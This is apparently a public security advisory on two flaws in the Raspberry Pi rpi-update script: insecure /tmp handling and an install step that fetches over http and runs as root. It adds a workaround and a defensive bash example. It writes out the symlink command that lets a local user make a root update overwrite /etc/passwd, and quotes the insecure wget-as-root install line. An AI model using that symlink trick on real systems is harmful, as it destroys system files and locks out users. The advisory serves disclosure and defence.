Raspberry Pi Firmware Updater Vulnerability

Application: https://github.com/Hexxeh/rpi-update/
Version Tested: GitHub source as of 10ad1e975a (10th Feb commit)

Vulnerability #1: A malicious user can clobber any file due to insecure tmp file handling.

Example: Any unprivileged user can create the following symlink, either from a shell account or through malicious web content such as PHP scripts.

    pi@raspberrypi ~ $ ln -s /etc/passwd /tmp/updateScript.sh

Once in place, the symlink waits for the administrator to run an update:

    pi@raspberrypi ~ $ sudo rpi-update
    ...
    pi@raspberrypi ~ $ cat /etc/passwd
    #!/bin/bash
    if mv "./testfile.sh.tmp" "./testfile.sh"; then
        rm -- "$0"
        exec env UPDATE_SELF=0 /bin/bash "./testfile.sh" ""
    else
        echo " !!! Failed!"
    fi

At this point the Pi is effectively unusable, since the password database has been overwritten. Note that the attacker cannot customise the content that is written, for example to add a UID 0 account.

Vulnerability #2: The installation instructions recommend the following command:

    sudo wget http://goo.gl/1BOfJ -O /usr/bin/rpi-update && sudo chmod +x /usr/bin/rpi-update

Although the self-update functionality uses SSL to ensure the integrity of the download, the installation process fetches the bash script through a URL-shortening service without SSL, and the user is then encouraged to run that script as root.

Fix and Vendor Response

A pull request detailing exploit #1 and including a simple patch was submitted February 6th. The patch has not yet been accepted.

Workaround

Running rpi-update with the self-update feature disabled avoids executing the affected code.

Example:

    sudo UPDATE_SELF=0 rpi-update

If you would like to update the application manually, or perform an initial installation safely, use the following commands:

    wget https://github.com/Hexxeh/rpi-update/raw/master/rpi-update
    sudo cp rpi-update /usr/bin/rpi-update && sudo chmod +x /usr/bin/rpi-update

Note that applying the patch in my pull request will not be a complete solution, as it will be reverted after the first automatic update.

technion@xxxxxxxxxxx
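The following is an added example, not code from rpi-update or from the advisory author, showing the defensive pattern both findings call for in a self-updating shell script: stage the downloaded script in a private directory from mktemp -d instead of a predictable /tmp name, refuse to write through a symlink at the destination, and refuse download URLs that are not https. The function names (require_https, safe_stage_update) are this example's own, and the demo at the bottom builds its victim file and planted link in a scratch directory rather than touching the real system.

```bash
#!/bin/bash
# Added example, not code from rpi-update or from the advisory author.
# Defensive counterpart to the two findings above: private staging via mktemp,
# no writes through symlinks, and https-only fetch URLs.
# Function names (require_https, safe_stage_update) are this example's own.

# Return 0 only for https:// URLs. The install one-liner on the page fetched
# over plain http through a URL shortener and then ran the result as root.
require_https() {
    case "$1" in
        https://*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Stage new script content (read from stdin) and install it at $1.
#
# The vulnerable pattern writes straight to a fixed name such as
# /tmp/updateScript.sh; a pre-planted symlink there redirects the write to any
# file root can touch (/etc/passwd in the advisory). Here the write goes into an
# unpredictable, mode-0700 directory created by mktemp -d, and a symlink at the
# destination is refused outright, so a planted link is never followed.
safe_stage_update() {
    dest="$1"
    if [ -L "$dest" ]; then
        echo "refusing to write through symlink: $dest" >&2
        return 2
    fi
    workdir=$(mktemp -d) || return 3
    staged="$workdir/update.sh"
    # umask 077: nobody else can read or replace the staged file while it
    # sits in the work directory.
    if ! (umask 077 && cat > "$staged"); then
        rm -rf -- "$workdir"
        return 4
    fi
    chmod 0755 "$staged"
    # mv renames over $dest rather than opening it for writing, so even a
    # symlink that appeared after the check above would be replaced, not followed.
    if ! mv -- "$staged" "$dest"; then
        rm -rf -- "$workdir"
        return 5
    fi
    rm -rf -- "$workdir"
    return 0
}

# Stand-alone demo: recreate the advisory's scenario in a scratch directory
# (constructed sample; nothing on the real system is touched) and show the
# planted link being refused.
if [ "${1:-}" = "--demo" ]; then
    scratch=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$scratch/passwd"
    ln -s "$scratch/passwd" "$scratch/updateScript.sh"
    printf '#!/bin/bash\necho updated\n' | safe_stage_update "$scratch/updateScript.sh"
    echo "exit status: $? (2 = refused); passwd still intact:"
    cat "$scratch/passwd"
    rm -rf -- "$scratch"
fi
```

Run it with `--demo` to see the refusal, or source it and pipe a downloaded script into `safe_stage_update /usr/bin/rpi-update`. The important property is that the only path the script ever opens for writing is one it created itself under mktemp, so there is no predictable name for a local user to pre-empt.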